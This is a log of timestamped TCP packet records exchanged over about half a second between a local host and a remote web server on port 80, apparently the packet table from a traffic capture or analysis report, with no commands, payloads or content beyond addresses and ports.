Nov 15, 2024 10:35:59.757385015 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.757405996 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.757457972 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.757692099 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.757716894 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.757728100 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.757740974 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.757766008 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.757775068 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.769467115 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.769512892 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.769517899 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.769531965 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.769566059 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.770018101 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.770030975 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.770073891 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.806814909 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.806849957 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.806883097 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.806915998 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.806917906 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.806962013 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.806972027 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.807044029 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.807076931 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.807089090 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.807147026 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.807180882 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.807197094 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.807215929 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.807260036 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.829436064 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.829515934 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.829550982 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.829586983 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.829615116 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.829621077 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.829658031 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.829673052 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.829694033 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.829716921 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.829727888 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.829773903 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.832320929 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.832355022 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.832390070 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.832408905 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.832751989 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.832813978 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.832847118 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.832880974 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.832930088 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.863217115 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.863274097 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.863310099 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.863341093 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.863616943 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.863653898 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.863667965 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.863688946 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.863734961 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.863744020 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.863791943 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.863842964 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.863889933 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.863924980 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.863957882 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.863970041 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.863995075 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.864027977 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.864037991 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.864064932 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.864106894 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.864681959 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.864753008 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.864787102 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.864804029 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.865024090 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.865058899 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.865073919 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.865094900 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.865129948 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.865139008 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.875688076 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.875721931 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.875751019 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.875756979 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.875946999 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.886681080 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.886769056 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.886805058 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.886826038 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.886862993 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.886895895 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.886908054 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.886930943 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.886965036 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.886975050 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.887001038 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.887042999 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.887470961 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.887525082 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.887558937 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.887573004 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.887595892 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.887630939 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.887643099 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.887665987 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.887702942 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.887711048 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.887733936 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.887770891 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.927028894 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.927164078 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.927223921 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.927231073 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.927278996 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.927339077 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.927344084 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.927378893 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.927423000 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.927459002 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.927506924 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.927542925 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.927572012 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.927582026 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.927632093 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.946187973 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.946249962 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.946316957 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.947130919 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.947182894 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.947216988 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.947236061 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.947251081 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.947287083 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.947302103 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.947349072 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.947382927 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.947398901 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.949382067 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.949415922 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.949501038 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.949513912 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.949548006 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.949995041 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.950028896 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.950061083 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.950078964 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.980144024 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.980267048 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.980303049 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.980334997 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.980370998 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.980396986 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.980438948 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.980767965 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.980864048 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.980900049 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.980912924 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.980933905 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.980968952 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.980978012 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.981004000 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.981038094 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.981049061 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.981074095 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.981120110 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.981384993 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.981466055 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.981515884 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.981597900 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.981631994 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.981666088 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.981676102 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.981699944 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.981743097 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.992746115 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.992850065 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.992908001 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.992927074 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.992961884 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.992999077 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.993011951 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.993030071 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.993071079 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.003870964 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.003926039 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.003959894 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.003985882 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.004035950 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.004089117 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.004105091 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.004139900 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.004173040 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.004194975 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.004205942 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.004244089 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.004255056 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.004462004 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.004513025 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.004774094 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.004805088 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.004852057 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.004857063 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.004893064 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.004928112 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.004941940 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.004962921 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.005009890 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.044730902 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.044886112 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.044919968 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.044950962 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.045545101 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.045600891 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.045628071 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.045695066 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.045725107 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.045746088 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.045758009 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.045794010 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.045813084 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.045826912 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.045861959 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.045872927 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.064966917 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.065001965 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.065054893 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.065085888 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.065120935 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.065154076 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.065215111 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.065707922 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.065992117 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.066025019 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.066056967 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.066060066 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.066111088 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.067044020 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.067079067 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.067111015 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.067173958 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.067975044 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.068032980 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.068036079 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.068068027 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.068100929 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.068114996 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.068135977 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.068190098 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.097769022 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.097810984 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.097867012 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.097867966 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.097904921 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.097939968 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.097949982 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.098272085 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.098301888 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.098321915 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.098354101 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.098388910 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.098397970 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.098423004 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.098458052 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.098464966 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.098723888 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.098757982 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.098769903 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.098793030 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.098838091 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.099006891 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.099081993 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.099117994 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.099124908 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.099153042 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.099189997 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.099195004 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.099560976 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.099600077 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.099621058 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.099634886 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.099689960 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.111263037 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.111300945 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.111351967 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.111358881 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.121931076 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.121967077 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.122000933 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.122001886 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.122062922 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.122142076 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.122194052 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.122227907 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.122246981 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.122262955 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.122297049 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.122308016 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.122334003 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.122368097 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.122380972 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.122404099 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.122437954 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.122447968 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.122473001 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.122519970 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.122886896 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.122921944 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.122955084 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.122967958 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.122989893 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.123034954 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.123166084 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.123636961 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.123689890 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.162565947 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.162616968 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.162763119 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.162770033 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.162806988 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.162842035 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.162856102 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.162875891 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.162919044 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.163443089 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.163492918 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.163528919 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.163562059 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.163613081 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.163647890 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.163666964 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.163681984 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.163726091 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.182823896 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.182956934 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.182987928 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.183021069 CET	80	49741	150.241.95.163	192.168.2.6
